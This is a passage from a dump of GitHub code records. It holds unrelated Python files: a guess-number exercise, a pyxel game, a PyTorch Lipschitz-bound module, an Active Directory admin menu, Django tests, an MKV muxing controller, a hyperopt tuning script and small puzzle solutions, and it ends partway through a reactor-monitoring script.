Добавьте возможность запуска функции “угадайки” из модуля в командной строке терминала.\n# Строка должна принимать от 1 до 3 аргументов: параметры вызова функции.\n# Для преобразования строковых аргументов командной строки в числовые параметры используйте\n# генераторное выражение.\n\n\"\"\"\nThis module will let you play \"the guess number\" game\nBut here you will be able to use terminal to communicate with the game\n\"\"\"\nfrom random import randint as ri\nfrom sys import argv\n\n__all__ = ['guessing']\n\ndef guessing(less_border: int, up_border: int, number_of_tries: int)->bool:\n num_to_guess = ri(less_border,up_border)\n count_of_tries = 0\n message = ''\n while count_of_tries < number_of_tries:\n num_from_user = int(input('Please enter the number: '))\n #num_from_user = int(argv[1])\n if num_from_user == num_to_guess:\n print('You guessed!!!')\n return True\n elif num_from_user > num_to_guess:\n message = 'This number is too big, try again.'\n elif num_from_user < num_to_guess:\n message = 'This number is too small, try again.'\n print(message)\n print(\"You could not guess, sorry...\")\n return False\n\nif __name__ == '__main__':\n nums = (num for num in argv[1:])\n print(guessing(*(int(num) for num in nums)))\n # name, *params = argv\n # print(guessing(*(int(num) for num in params)))\n\n","repo_name":"MarSerMer/Python_practice_2","sub_path":"Python_practice_2/seminar_6/sem_6_task_3_improve_guess_number.py","file_name":"sem_6_task_3_improve_guess_number.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6729576803","text":"import pyxel\nfrom Actor.Player import Player\nimport ResourceHelper\nfrom Vector2 import Vector2\nfrom Level import Level\nfrom Shop import Shop\nimport Config\nimport random\nimport math\nimport os\nimport sys\nimport threading\nimport time\n\n# Allow imports from all project directories\nsys.path.insert(0, sys.path[0])\n# sys.path.insert(1, os.path.join(sys.path[0], \"Map\"))\n# sys.path.insert(2, os.path.join(\n# os.path.join(sys.path[0], \"Map\"), \"TilePresets\"))\n\n\nclass App:\n def __init__(self):\n pyxel.init(Config.SCREEN_HEIGHT, Config.SCREEN_WIDTH)\n pyxel.mouse(True)\n # We load all the resources here\n pyxel.load(\"Resources\\\\resources.pyxres\")\n\n pyxel.image(1).load(0, 0, \"Resources\\\\LoadingText.png\")\n\n self.playMusic = True\n pyxel.playm(0, loop=True)\n self.reset()\n pyxel.run(self.update, self.draw)\n\n def reset(self):\n self.player = Player()\n self.levelNumber = 0\n self.inShop = False\n self.shop = Shop(self.player)\n self.gold = 0\n self.loadNextLevel()\n\n def loadNextLevelInternal(self):\n self.loadingLevel = True\n self.level = Level(self.levelNumber, self.player)\n self.loadingLevel = False\n\n def loadNextLevel(self):\n self.loadingLevel = True\n self.levelNumber += 1\n loadingThread = threading.Thread(target=self.loadNextLevelInternal)\n loadingThread.start()\n pyxel.cls(7)\n imageSize = 300\n offsetX = (Config.SCREEN_WIDTH - imageSize) / 2\n offsetY = (Config.SCREEN_HEIGHT - imageSize) / 2\n pyxel.blt(offsetX, offsetY, 1, 0, 0, imageSize, imageSize)\n pyxel.flip()\n while(self.loadingLevel):\n time.sleep(0.1)\n\n def update(self):\n if self.inShop:\n done, self.gold = self.shop.update(self.gold)\n if done:\n self.inShop = False\n pyxel.stop(0)\n if self.playMusic:\n pyxel.playm(0, loop=True)\n self.loadNextLevel()\n\n return\n\n status = self.level.update(self)\n if (status == 1 or pyxel.btnp(pyxel.KEY_P)):\n pyxel.stop(0)\n if self.playMusic:\n pyxel.playm(1, loop=True)\n self.inShop = True\n elif(status == 2):\n self.reset()\n\n if (pyxel.btnp(pyxel.KEY_O)):\n self.playMusic = not self.playMusic\n if self.playMusic:\n pyxel.playm(0, loop=True)\n else:\n pyxel.stop(0)\n\n if (pyxel.btnp(pyxel.KEY_I)):\n self.gold += 100\n\n def draw(self):\n pyxel.cls(0)\n if self.inShop:\n self.shop.draw()\n else:\n self.level.draw()\n\n pyxel.blt(0, 0, 0, 0, 64, 16, 16, 3)\n pyxel.text(16, 6, f\"{self.gold}\", 7)\n\n\nApp()\n","repo_name":"Magxm/FIT2-Example","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7275719529","text":"import math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom scipy.sparse import linalg\n\n\n@torch.no_grad()\ndef lip_constant(kernel, imsize, transpose=False, sqrt=False, **kwargs):\n out_channels, in_channels, _, _ = kernel.shape\n channels = out_channels if transpose else in_channels\n height, width = imsize\n dim = channels * height * width\n\n def matvec(v):\n v = torch.tensor(v, dtype=kernel.dtype, device=kernel.device)\n v = v.view(1, channels, height, width)\n if transpose:\n v = F.conv_transpose2d(v, kernel, **kwargs)\n v = F.conv2d(v, kernel, **kwargs)\n else:\n v = F.conv2d(v, kernel, **kwargs)\n v = F.conv_transpose2d(v, kernel, **kwargs)\n return v.view(-1).cpu().numpy()\n\n conv = linalg.LinearOperator((dim, dim), matvec=matvec)\n eig = linalg.eigsh(conv, k=1, which='LM', return_eigenvectors=False).item()\n if sqrt:\n eig = math.sqrt(eig)\n\n return eig\n\n\nclass LipBoundConv2d(nn.Module):\n \"\"\"A module to estimate the (squared) Lipschitz constant of a Conv2d layer.\n\n The Lipschitz constant of a Conv2d is the largest singular value of the\n corresponding Toeplitz matrix. This module computes a close lower bound of\n the constant that is very fast, based on the approximation developed in\n \"On lipschitz regularization of convolutional layers using toeplitz matrix\n theory\" by Araujo et al., 2020.\n\n For ISTA we need the max eigenvalue of W^T W, corresponding to the square\n of the max singular value of W. Hence we set sqrt=False by default for\n the classical ISTA use case.\n \"\"\"\n def __init__(self, kernel_size, padding, stride=1, sample=50, sqrt=False):\n super().__init__()\n assert len(kernel_size) == 4\n if not kernel_size[-1] == kernel_size[-2]:\n raise ValueError(\"The last 2 dim of the kernel must be equal.\")\n if not kernel_size[-1] % 2 == 1:\n raise ValueError(\"The dimension of the kernel must be odd.\")\n if not stride == 1:\n raise NotImplementedError(\"LipBound not implemented for stride > 1.\")\n ksize = kernel_size[-1]\n self.ksize = ksize\n self.sqrt = sqrt\n\n # define frequencies \\omega0 and \\omega1\n x = torch.linspace(0, 2*math.pi, sample)\n w0, w1 = torch.meshgrid(x, x)\n w0 = w0.reshape(-1,1)\n w1 = w1.reshape(-1,1)\n\n # define location indices h0 and h1\n p_index = 1.0 + torch.arange(padding-ksize, padding)\n H0, H1 = torch.meshgrid(p_index, p_index)\n H0 = H0.reshape(1,-1)\n H1 = H1.reshape(1,-1)\n buf = (w0 * H0 + w1 * H1).T\n self.register_buffer('buf', buf)\n\n def forward(self, kernel):\n assert kernel.dim() == 4\n assert kernel.size(2) == kernel.size(3) == self.ksize\n if kernel.size(0) > kernel.size(1):\n kernel = kernel.transpose(0,1)\n\n real = torch.cos(self.buf) # [K**2, S**2]\n imag = torch.sin(self.buf)\n\n kernel = kernel.flatten(2) # [Co, Ci, K**2]\n poly_real = torch.matmul(kernel, real) # [Co, Ci, S**2]\n poly_imag = torch.matmul(kernel, imag) # [Co, Ci, S**2]\n poly1 = poly_real.square().sum(1) # [Co, S**2]\n poly2 = poly_imag.square().sum(1) # [Co, S**2]\n poly = poly1 + poly2\n bound = poly.max(-1)[0].sum() # maximum eigenvalue of W^T W\n if self.sqrt:\n bound = bound.sqrt() # maximum singular value of W\n\n return bound\n\n\ndef lip_bound_conv2d(kernel, padding, stride=1, sample=50, sqrt=False):\n \"\"\"functional variant of the above module\"\"\"\n assert kernel.dim() == 4\n if not kernel.size(-1) == kernel.size(-2):\n raise ValueError(\"The last 2 dim of the kernel must be equal.\")\n if not kernel.size(-1) % 2 == 1:\n raise ValueError(\"The dimension of the kernel must be odd.\")\n if not stride == 1:\n raise NotImplementedError(\"LipBound not implemented for stride > 1.\")\n ksize = kernel.size(-1)\n if kernel.size(0) > kernel.size(1):\n kernel = kernel.transpose(0,1)\n\n # define frequencies \\omega0 and \\omega1\n x = torch.linspace(0, 2*math.pi, sample)\n w0, w1 = torch.meshgrid(x, x)\n w0 = w0.reshape(-1,1)\n w1 = w1.reshape(-1,1)\n\n # define location indices h0 and h1\n p_index = 1.0 + torch.arange(padding-ksize, padding)\n H0, H1 = torch.meshgrid(p_index, p_index)\n H0 = H0.reshape(1,-1)\n H1 = H1.reshape(1,-1)\n buf = (w0 * H0 + w1 * H1).T\n\n real = torch.cos(buf) # [K**2, S**2]\n imag = torch.sin(buf)\n\n kernel = kernel.flatten(2) # [Co, Ci, K**2]\n poly_real = torch.matmul(kernel, real) # [Co, Ci, S**2]\n poly_imag = torch.matmul(kernel, imag) # [Co, Ci, S**2]\n poly1 = poly_real.square().sum(1) # [Co, S**2]\n poly2 = poly_imag.square().sum(1) # [Co, S**2]\n poly = poly1 + poly2\n bound = poly.max(-1)[0].sum() # maximum eigenvalue of W^T W\n if sqrt:\n bound = bound.sqrt() # maximum singular value of W\n\n return bound","repo_name":"rfeinman/pytorch-lasso","sub_path":"lasso/conv2d/lip_const.py","file_name":"lip_const.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"5"} +{"seq_id":"74336334553","text":"# Author: Alberto Vázquez\r\n# https://github.com/alb3rtov/\r\n# https://informaticaenuno.wordpress.com/\r\n# Version alfa-0.12.8\r\n# CONFIGURATION MENU ACTIVE DIRECTORY\r\n\r\n\r\n##############################\r\n### PACKAGES IMPORTED ###\r\n##############################\r\n\r\nimport time\r\nimport os, sys\r\nimport signal\r\nimport subprocess\r\nimport os.path as path\r\nfrom management import bfunc\r\n#import glob\r\n\r\n\r\n#Function to avoid Ctrl+C\r\ndef sigint_handler(signum, frame):\r\n print();\r\n print(\"Please, don't press Ctrl+C\");\r\n print();\r\n time.sleep(1);\r\n\r\nsignal.signal(signal.SIGINT, sigint_handler)\r\n\r\n\r\n############################### Fourth Menu Options ######################################\r\n# The first three options are stored in bfunc.py script\r\n\r\n\r\n#Fourth Option, check FSMO Roles\r\ndef FSMORoles():\r\n print();\r\n print(\" [*] Checking if your system is Domain Controller \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n p = subprocess.Popen([\"powershell.exe\", \".\\\\scripts\\\\cup\\\\dccheck.ps1\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n\r\n lines = len(open('.\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt').readlines());\r\n\r\n p1 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt\"],stdout=sys.stdout);\r\n p2 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\dcdiag.txt\"],stdout=sys.stdout);\r\n\r\n #print (lineas2);\r\n\r\n if (lines != 0):\r\n print();\r\n print(\" Your system is NOT Domain Controller, use option 1 to promote your system in a Domain Controller\");\r\n bfunc.PressKey();\r\n else:\r\n print();\r\n os.system('netdom query fsmo');\r\n bfunc.PressKey();\r\n\r\n#Fiveth Option, check Global Catalog\r\ndef GlobalCatalog():\r\n print();\r\n print(\" [*] Checking if your system is Domain Controller \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n p = subprocess.Popen([\"powershell.exe\", \".\\\\scripts\\\\cup\\\\dccheck.ps1\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n\r\n lines = len(open('.\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt').readlines());\r\n\r\n p1 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\checkdcdiag.txt\"],stdout=sys.stdout);\r\n p2 = subprocess.Popen([\"powershell.exe\", \"del .\\\\scripts\\\\cup\\\\temp\\\\dcdiag.txt\"],stdout=sys.stdout);\r\n\r\n #print (lineas2);\r\n\r\n if (lines != 0):\r\n print();\r\n print(\" Your system is NOT Domain Controller, use option 1 to promote your system in a Domain Controller\");\r\n bfunc.PressKey();\r\n else:\r\n print();\r\n p = subprocess.Popen([\"powershell.exe\", \"Get-ADDomainController | ft Name,IsGlobalCatalog\"],stdout=sys.stdout); # se ponen dos barras para que no de problemas de codec\r\n p.communicate();\r\n bfunc.PressKey();\r\n\r\n\r\n\r\n#cuarto menu\r\ndef FourthMenu():\r\n time.sleep(0.5)\r\n print(\"\");\r\n print(\" [*] Wait while it loads the menu \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n\r\n while True:\r\n print (\"\");\r\n print (\"============= Menu of system check as Domain Controller =============\");\r\n print (\"\");\r\n print (\" 1 -> Promote this server to Domain Controller \");\r\n print (\" 2 -> Check if this server is a Domain Controller \");\r\n print (\" 3 -> Delete the Active Directory Domain Service \");\r\n print (\" 4 -> Check FSMO Roles \");\r\n print (\" 5 -> Check Global Catalog \");\r\n print (\" 6 -> Back (previous menu) \");\r\n print (\"\");\r\n numOptions = 6;\r\n opcion = bfunc.ChooseOption(numOptions);\r\n if (opcion == 1):\r\n bfunc.PromoteDC();\r\n elif (opcion == 2):\r\n bfunc.CheckDC();\r\n elif (opcion == 3):\r\n bfunc.DeleteAD();\r\n elif (opcion == 4):\r\n FSMORoles();\r\n elif (opcion == 5):\r\n GlobalCatalog();\r\n elif (opcion== 6):\r\n print();\r\n print(\" [*] Wait while it loads the menu \",end=\"\");\r\n bfunc.LoadAnimation();\r\n print();\r\n sys.exit();\r\n else:\r\n break;\r\n\r\n\r\n# This part of code of here is just a way of 'security' to avoid that the users\r\n# execute the another scripts (.exe or .py) directly.\r\n# This is because for a good working of this program, first, is necessary check\r\n# Active Directory and Domain Controller parameters and this code is in the firsts scripts.\r\n\r\nsearch = \"security.txt\"\r\ndirectory = os.getcwd()\r\ntotal = 0\r\n\r\nif (len(sys.argv) > 1):\r\n if (not os.path.isdir(sys.argv[1])):\r\n #print(sys.argv[1],\" no se reconoce como directorio\")\r\n sys.exit(1)\r\n directory = sys.argv[1]\r\n\r\nfor root, dir, ficheros in os.walk(directory):\r\n for fichero in ficheros:\r\n if (search in fichero.lower()):\r\n #print(root+\"\\\\\"+fichero)\r\n total += 1\r\n\r\n#print(\"En total hay\", total, \"archivos con\", buscar)\r\nif (total == 1):\r\n os.system('del menus\\\\security.txt');\r\n FourthMenu();\r\nelse:\r\n sys.exit();\r\n","repo_name":"alb3rtov/ICAAD-Software","sub_path":"menus/adconfig.py","file_name":"adconfig.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29037383753","text":"import json\nfrom datetime import datetime\n\nimport pytest\nfrom django.http import Http404\nfrom django.urls import reverse\n\nfrom donate_anything.charity.models import AppliedBusinessEdit, AppliedOrganizationEdit\nfrom donate_anything.charity.tests.factories import (\n AppliedBusinessEditFactory,\n AppliedOrganizationEditFactory,\n)\nfrom donate_anything.charity.views.list import organization\n\n\npytestmark = pytest.mark.django_db\n\n\ndef _format_datetime_to_content_str(dt: datetime):\n return dt.strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3] + \"Z\"\n\n\nclass TestOrganizationView:\n def test_organization_view_success(self, charity, client):\n response = client.get(\n reverse(\"charity:organization\", kwargs={\"pk\": charity.id})\n )\n assert response.status_code == 200\n assert response.context[\"name\"] == charity.name\n assert response.context[\"description\"] == charity.description\n assert response.context[\"how_to_donate\"] == charity.how_to_donate\n\n def test_organization_view_not_found(self, rf):\n fake_id = 1\n request = rf.get(reverse(\"charity:organization\", kwargs={\"pk\": fake_id}))\n with pytest.raises(Http404):\n organization(request, fake_id)\n\n\nclass TestViewEdits:\n @pytest.mark.parametrize(\n \"factory,model,view\",\n [\n (\n AppliedOrganizationEditFactory,\n AppliedOrganizationEdit,\n \"charity:applied-organization-edits\",\n ),\n (\n AppliedBusinessEditFactory,\n AppliedBusinessEdit,\n \"charity:applied-business-edits\",\n ),\n ],\n )\n def test_applied_organization_edits(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n model,\n view,\n ):\n client.force_login(user)\n if factory == AppliedOrganizationEditFactory:\n factory.create_batch(30, proposed_entity=organization_application)\n response = client.get(\n reverse(view, kwargs={\"pk\": organization_application.id})\n + \"?page=2&unseen=1\"\n )\n else:\n factory.create_batch(30, proposed_entity=business_application)\n response = client.get(\n reverse(view, kwargs={\"pk\": business_application.id})\n + \"?page=2&unseen=1\"\n )\n assert response.status_code == 200\n content = json.loads(response.content.decode())[\"data\"]\n assert len(content) == 5, \"Pagination is 25 in length. 30-25 is 5.\"\n assert len(content[0]) == 5, \"pk, username, edit, created, updated\"\n obj = model.objects.get(id=int(content[0][0]))\n assert content[0][1] == obj.user.username\n assert content[0][2] == obj.edit\n assert content[0][3] == _format_datetime_to_content_str(obj.created)\n assert content[0][4] == _format_datetime_to_content_str(obj.updated)\n\n @pytest.mark.parametrize(\n \"factory,view\",\n [\n (AppliedOrganizationEditFactory, \"charity:applied-organization-edits\"),\n (AppliedBusinessEditFactory, \"charity:applied-business-edits\"),\n ],\n )\n def test_show_only_unseen(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n view,\n ):\n client.force_login(user)\n if factory == AppliedOrganizationEditFactory:\n not_seen = factory.create(\n proposed_entity=organization_application, viewed=False\n )\n factory.create(proposed_entity=organization_application, viewed=True)\n response = client.get(\n reverse(view, kwargs={\"pk\": organization_application.id}) + \"?unseen=1\"\n )\n else:\n not_seen = factory.create(\n proposed_entity=business_application, viewed=False\n )\n factory.create(proposed_entity=business_application, viewed=True)\n response = client.get(\n reverse(view, kwargs={\"pk\": business_application.id}) + \"?unseen=1\"\n )\n assert response.status_code == 200\n content = json.loads(response.content.decode())[\"data\"]\n assert len(content) == 1, \"Should only see the not-closed/read one.\"\n assert content[0] == [\n not_seen.id,\n not_seen.user.username,\n not_seen.edit,\n _format_datetime_to_content_str(not_seen.created),\n _format_datetime_to_content_str(not_seen.updated),\n ]\n\n @pytest.mark.parametrize(\n \"factory,view\",\n [\n (AppliedOrganizationEditFactory, \"charity:applied-organization-edits\"),\n (AppliedBusinessEditFactory, \"charity:applied-business-edits\"),\n ],\n )\n def test_show_all_edits(\n self,\n organization_application,\n business_application,\n client,\n user,\n factory,\n view,\n ):\n self.test_show_only_unseen(\n organization_application, business_application, client, user, factory, view\n )\n if factory == AppliedOrganizationEditFactory:\n response = client.get(\n reverse(view, kwargs={\"pk\": organization_application.id})\n )\n else:\n response = client.get(reverse(view, kwargs={\"pk\": business_application.id}))\n assert response.status_code == 200\n content = json.loads(response.content.decode())[\"data\"]\n assert len(content) == 2\n seen = []\n for x in content:\n assert len(x) == 6\n seen.append(x[5])\n assert set(seen) == {True, False}\n","repo_name":"Donate-Anything/Donate-Anything","sub_path":"donate_anything/charity/tests/views/test_view.py","file_name":"test_view.py","file_ext":"py","file_size_in_byte":5750,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"30454709876","text":"import sys\nimport glob\nimport logging\nimport threading\n\nfrom events import Events\nfrom pymkv import MKVFile as MKVFile\n\nfrom PySide2.QtWidgets import QFileDialog, QListWidgetItem, QListWidget\nfrom PySide2.QtCore import QTranslator as tr\nimport PySide2.QtCore\n\nfrom pymkv_wrapper import PymkvWrapper\nfrom gui_helper import GuiHelper\n\nlogger = logging.getLogger(__name__)\n\n\nclass BatchFileController:\n\n def __init__(self):\n self._source_1_list = []\n self._source_2_list = []\n self.events = Events()\n\n self._tracks_1 = []\n self._tracks_2 = []\n\n self._user_settings_1 = []\n self._user_settings_2 = []\n\n self.output_directory = None\n\n self.events.on_batch_list_update += self.generate_item\n\n @property\n def source_1_list(self):\n return self._source_1_list\n\n @source_1_list.setter\n def source_1_list(self, file_list):\n self._source_1_list = file_list\n self.events.on_batch_list_update(file_list, 1)\n\n @property\n def source_2_list(self):\n return self._source_2_list\n\n @source_2_list.setter\n def source_2_list(self, file_list):\n self._source_2_list = file_list\n self.events.on_batch_list_update(file_list, 2)\n\n @property\n def user_setting_1(self):\n return self._user_settings_1\n\n @property\n def user_setting_2(self):\n return self._user_settings_2\n\n def generate_item(self, file_list, list_num: int):\n\n if list == 1:\n self._source_1_list.extend(file_list)\n elif list == 2:\n self._source_2_list.extend(file_list)\n\n for file in file_list:\n item = QListWidgetItem(file)\n self.events.batch_file_item_generated(item, list_num)\n\n def generate_track_item(self, ref_num: int):\n \"\"\"\n Generate the track list for the two input directories with the first file in the list\n :return:\n \"\"\"\n\n if len(self._source_1_list) != 0 and ref_num == 1:\n\n self._tracks_1 = PymkvWrapper.process_file(self._source_1_list[0])\n\n #TODO turn item generate into GUI helper\n for track in self._tracks_1:\n\n track_name = \"N/A\"\n track_type = track._track_type\n\n if track.track_name is not None:\n track_name = track.track_name\n\n track_item_1 = QListWidgetItem(\"Track Name: \" + track_name + \" | \" + \"Type: \" + track_type)\n track_item_1.setFlags(track_item_1.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsUserCheckable)\n track_item_1.setFlags(track_item_1.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsEnabled)\n track_item_1.setCheckState(PySide2.QtCore.Qt.CheckState.Unchecked)\n\n self.events.ref_tracks_generated(self._source_1_list[0], track_item_1, 1)\n\n if len(self._source_2_list) != 0 and ref_num == 2:\n\n self._tracks_2 = PymkvWrapper.process_file(self._source_2_list[0])\n # TODO turn item generate into GUI helper\n for track in self._tracks_2:\n\n track_name = \"N/A\"\n track_type = track._track_type\n\n if track.track_name is not None:\n track_name = track.track_name\n\n track_item_2 = QListWidgetItem(\"Track Name: \" + track_name + \" | \" + \"Type: \" + track_type)\n track_item_2.setFlags(track_item_2.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsUserCheckable)\n track_item_2.setFlags(track_item_2.flags() | PySide2.QtCore.Qt.ItemFlag.ItemIsEnabled)\n track_item_2.setCheckState(PySide2.QtCore.Qt.CheckState.Unchecked)\n\n self.events.ref_tracks_generated(self._source_2_list[0], track_item_2, 2)\n\n def gather_all_selected_track(self, list_1: QListWidget, list_2: QListWidget):\n\n self._user_settings_1 = []\n self._user_settings_2 = []\n logger.debug(\"Gathering selected tracks\")\n\n for index in range(list_1.count()):\n\n item = list_1.item(index)\n if item.checkState() == PySide2.QtCore.Qt.Checked:\n self._user_settings_1.append(index)\n\n logger.debug(\"Reference 1 Tracks : \" + str(self._user_settings_1).strip('[]'))\n\n for index in range(list_2.count()):\n\n item = list_2.item(index)\n if item.checkState() == PySide2.QtCore.Qt.Checked:\n self._user_settings_2.append(index)\n\n logger.debug(\"Reference 2 Tracks : \" + str(self._user_settings_2).strip('[]'))\n\n def batch_mux_files(self,):\n batch_mux_thread = threading.Thread(\n PymkvWrapper.batch_mux_files(self.source_1_list, self.source_1_list,\n self.user_setting_1, self.user_setting_2,\n self.output_directory))\n batch_mux_thread.start()\n\n def clear_all(self):\n self._source_1_list = []\n self._source_2_list = []\n self._tracks_1 = []\n self._tracks_2 = []\n self._user_settings_1 = []\n self._user_settings_2 = []\n self.events.clear_all()\n","repo_name":"adriankchan/AnotherMKVMuxGUI","sub_path":"batch_file_controller.py","file_name":"batch_file_controller.py","file_ext":"py","file_size_in_byte":5119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"15779594921","text":"import os\nimport warnings\n\nimport numpy\nimport pandas as pd\nfrom hyperopt import fmin, tpe, hp, STATUS_OK, Trials, STATUS_FAIL\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\n\nfrom src.data_path import load_data\nfrom src.data_readers.tagged_preg_reader import tagged_data_reader\nfrom src.main.drug_pregnancy_experiments.pregnancy_drug_experment import transform_labels\n\nos.chdir('..\\\\..\\\\..')\nlarge_number = 1\n\n\ndef score(params):\n print(\"Training with params : \")\n print(params)\n # for p in ['n_estimators','num_k_best']:\n # params[p] = int(params[p])\n stat = STATUS_OK\n curr_score=0\n\n try:\n all_auc = []\n for i in range(10):\n kf = StratifiedKFold(n_splits=10, random_state=i, shuffle=True)\n model = make_pipeline(\n StandardScaler(),\n KNeighborsClassifier(**params)\n )\n val = cross_val_score(model , X_cv, y, cv=kf, n_jobs=4, scoring='roc_auc')\n all_auc.extend(val)\n\n curr_score = np.array(all_auc).mean()\n\n except:\n stat = STATUS_FAIL\n\n print(\"\\tAUC {0}\\n\\n\".format(curr_score))\n return {'loss': 1 - curr_score, 'status': stat}\n\n\ndef optimize(trials):\n best = fmin(score, space, algo=tpe.suggest, trials=trials, max_evals=300)\n print('best params:')\n print(best)\n\n\nwarnings.filterwarnings(\"ignore\")\n\nX_unlabled = load_data()\n\ncols = list(X_unlabled.columns)\ncols.remove('drugBank_id')\n#\n# sums = X_unlabled[cols].astype(bool).sum()\n# limit = 3#len(raw_X)*0.0005\n# sums = sums[sums>=limit]\n# cols = list(sums.index)\n# cols.append('drugBank_id')\n# #raw_tagged_data = raw_tagged_data.loc[:,sums.index]\n# X_unlabled = X_unlabled.loc[:,cols]\n#\n\npreg_tagged_data_reader = tagged_data_reader()\nX_cv = X_unlabled.merge(preg_tagged_data_reader.read_all(),on='drugBank_id',how='inner')\ny_cv = X_cv['preg_class']\ndel X_cv['drugBank_id']\ndel X_cv['preg_class']\n\ny = numpy.ravel(pd.DataFrame(transform_labels(y_cv)).values)\ntrials = Trials()#Trials object where the history of search will be stored\n\n\nspace = {\n 'n_neighbors': hp.uniformint('n_neighbors', 1, 200), # hp.normal\n 'weights': 'distance',#hp.choice('weights', ['distance']),\n 'n_jobs': 4,\n 'p': 1#hp.choice('p', [1,2,3]),\n}\n\nif __name__ == \"__main__\":\n optimize(trials)\n","repo_name":"asnatm/ddi","sub_path":"src/main/drug_pregnancy_experiments/hyper_params_NN.py","file_name":"hyper_params_NN.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29778193702","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 23 20:51:54 2022\n\n@author: terad\n\"\"\"\n\nS = list(input())\na,b = map(int,input().split())\n\nA,B = a-1,b-1\nS[A],S[B] = S[B],S[A]\n\nprint(''.join(S))","repo_name":"daichiterazawa/Atcoder","sub_path":"AtCoder Beginner Contest 236/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74222037271","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def balanceBST(self, root: TreeNode) -> TreeNode:\n self.arr=[]\n self.inorder(root)\n return self.construct(0,len(self.arr)-1)\n \n def construct(self,beg,end):\n if beg>end:\n return None\n \n mid=(beg+end)//2\n root=TreeNode(self.arr[mid],None,None)\n \n root.left=self.construct(beg,mid-1)\n root.right=self.construct(mid+1,end)\n \n return root\n \n def inorder(self,root):\n if root==None:\n return \n \n self.inorder(root.left)\n self.arr.append(root.val)\n self.inorder(root.right)\n \n","repo_name":"Gautam1589/LeetCoding-GFG","sub_path":"1382-balance-a-binary-search-tree/1382-balance-a-binary-search-tree.py","file_name":"1382-balance-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"73840256153","text":"from pycatchmod.io.excel import (read_parameters, read_results,\n excel_parameter_adjustment, compare, open_workbook)\nimport json\nimport os\nimport pytest\nimport numpy as np\n\nJSON_SAMPLE = os.path.join(os.path.dirname(__file__), \"data\", \"thames.json\")\nEXCEL_SAMPLE = os.path.join(os.path.dirname(__file__), \"data\", \"thames.xls\")\n@pytest.fixture\ndef wb():\n return open_workbook(EXCEL_SAMPLE)\n\ndef test_read_parameters(wb):\n name, subcatchments = read_parameters(wb)\n assert(name == \"Thames\")\n assert(len(subcatchments) == 3)\n\n # check all parameters have been read correctly by comparing them to the\n # json version of the model\n json_data = json.load(open(JSON_SAMPLE,\"r\"))\n parameter_names = list(json_data[\"subcatchments\"][0].keys())\n for n in range(0, len(subcatchments)):\n for key in parameter_names:\n assert(subcatchments[n][key] == json_data[\"subcatchments\"][n][key])\n\ndef test_read_results(wb):\n results = read_results(wb)\n\n # all arrays should have the same length\n for a in results.values():\n assert(len(a) == 31)\n\n assert(results[\"dates\"][0] == np.datetime64(\"1920-01-01\"))\n assert(results[\"dates\"][-1] == np.datetime64(\"1920-01-31\"))\n\n # we use some dummy values here to make testing easy\n\n assert(results[\"recharge\"][-1] == 31)\n assert(results[\"smd_upper\"][-1] == 62)\n assert(results[\"smd_lower\"][-1] == 93)\n\n assert(results[\"flow_sim\"][-1] == 124)\n assert(results[\"flow_obs\"][-1] == 278)\n\n assert(results[\"rainfall\"][-1] == 185)\n assert(results[\"pet\"][-1] == 216)\n","repo_name":"pywr/pycatchmod","sub_path":"tests/test_excel.py","file_name":"test_excel.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"13141186611","text":"import pandas as pd\nimport datetime\nimport os\nimport smtplib\nfrom twilio.rest import Client\n\nnotified = {}\nrpm = 1000\n\n\ndef read_csv():\n \"\"\"\n Reads the contents of the reactor's csv file.\n\n :return: a pandas dataframe of the reactor's csv\n \"\"\"\n dtype = {'Timestamp': 'str', 'Agitation [rpm]': 'float', 'Airflow [mL/s]': 'float', 'DO [%]': 'float',\n 'Temp [C]': 'float', 'pH': 